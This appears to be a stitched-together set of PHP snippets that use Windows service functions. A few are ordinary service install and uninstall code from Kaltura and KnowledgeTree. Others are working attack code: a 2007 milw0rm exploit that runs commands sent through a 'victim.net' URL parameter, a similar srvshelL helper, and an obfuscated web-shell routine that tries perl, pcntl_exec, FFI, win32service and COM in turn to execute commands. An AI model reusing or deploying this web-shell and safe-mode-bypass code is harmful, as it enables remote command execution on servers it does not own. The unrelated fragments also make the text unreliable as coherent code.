public function uninstall() { $this->action(function () { cmd::echoL1('UnInstalling service: ' . Settings::$service . PHP_EOL); return win32_delete_service(Settings::$service); }); }
function srvshelL($command) { $name = whereistmP() . "\\" . uniqid('NJ'); $n = uniqid('NJ'); $cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec']; win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while (!file_exists($name)) { sleep(1); } $exec = file_get_contents($name); unlink($name); return $exec; }
} else { KalturaLog::info('Service Status Unknown'); } } } } } } } exit(0); case 'install': win32_create_service(array('service' => $serviceName, 'display' => 'Kaltura asynchronous batch jobs scheduler', 'description' => 'Kaltura asynchronous batch jobs scheduler', 'params' => __FILE__ . " run {$phpPath} {$iniDir}", 'path' => $phpPath, 'start_type' => WIN32_SERVICE_AUTO_START, 'error_control' => WIN32_SERVER_ERROR_NORMAL)); KalturaLog::info('Service Installed'); exit(0); case 'uninstall': win32_delete_service($serviceName); KalturaLog::info('Service Removed'); exit(0); case 'start': win32_start_service($serviceName); KalturaLog::info('Service Started'); exit(0); case 'stop': win32_stop_service($serviceName); KalturaLog::info('Service Stopped'); exit(0); case 'run': win32_start_service_ctrl_dispatcher($serviceName); win32_set_service_status(WIN32_SERVICE_RUNNING); break; case 'debug':
public function delete() { if ($this->status() !== WIN32_SERVICE_STOPPED) { throw new \Exception("Service " . $this->serviceDisplayName . " is not stopped."); } if (win32_delete_service($this->serviceName)) { error_log("Service " . $this->serviceDisplayName . " deleted"); return true; } throw new \Exception("Error deleting service: " . $this->serviceDisplayName); }
### ### ### Note: Tested on 5.2.1 ### ### ### ### Author: NetJackal ### ### Email: nima_501[at]yahoo[dot]com ### ### Website: http://netjackal.by.ru ### ### ### ### ### ### Usage: http://victim.net/nj.php?CMD=[command] ### ##################################################### $command = isset($_GET['CMD']) ? $_GET['CMD'] : 'dir'; #cammand $dir = ini_get('upload_tmp_dir'); #Directory to store command's output if (!extension_loaded('win32service')) { die('win32service extension not found!'); } $name = $dir . "\\" . uniqid('NJ'); $n = uniqid('NJ'); $cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec']; win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); $exec = file_get_contents($name); unlink($name); echo "<pre>" . htmlspecialchars($exec) . "</pre>"; ?> # milw0rm.com [2007-07-27]
* * This program is free software; you can redistribute it and/or modify it under * the terms of the GNU General Public License version 3 as published by the * Free Software Foundation. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more * details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. * * You can contact KnowledgeTree Inc., PO Box 7775 #87847, San Francisco, * California 94120-7775, or email info@knowledgetree.com. * * The interactive user interfaces in modified source and object code versions * of this program must display Appropriate Legal Notices, as required under * Section 5 of the GNU General Public License version 3. * * In accordance with Section 7(b) of the GNU General Public License version 3, * these Appropriate Legal Notices must retain the display of the "Powered by * KnowledgeTree" logo and retain the original copyright notice. If the display of the * logo is not reasonably feasible for technical reasons, the Appropriate Legal Notices * must display the words "Powered by KnowledgeTree" and retain the original * copyright notice. * Contributor( s): ______________________________________ * */ win32_delete_service('ktscheduler');
function z6v($c) { global $win, $tempdir; $r = ''; if (!empty($c)) { if (!$win) { if (extension_loaded('perl')) { @ob_start(); $p = new perl(); $p->eval("system('{$c}')"); $r = @ob_get_contents(); @ob_end_clean(); } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) { $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n'; $o = $tempdir . uniqid('pcntl'); $pid = @pcntl_fork(); if ($pid == -1) { $r .= '[-] Could not fork. Exit'; } elseif ($pid) { $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.'; } else { $c = array(" -e 'system(\"{$c} > {$o}\")'"); if (@pcntl_exec('/usr/bin/perl', $c)) { exit(0); } if (@pcntl_exec('/usr/local/bin/perl', $c)) { exit(0); } die; } $r = z9p($o); @unlink($o); } } else { $o = $tempdir . uniqid('NJ'); if (extension_loaded('ffi')) { $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0); while (!@file_exists($o)) { sleep(1); } $r = z9p($o); } elseif (extension_loaded('win32service')) { $s = uniqid('NJ'); @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\"")); @win32_start_service($s); @win32_stop_service($s); @win32_delete_service($s); while (!@file_exists($o)) { sleep(1); } $r = z9p($o); } elseif (extension_loaded("win32std")) { @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"'); while (!@file_exists($o)) { sleep(1); } $r = z9p($o); } else { $a = new COM("WScript.Shell"); $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"'); $r = z9p($o); } @unlink($o); } } return $r; }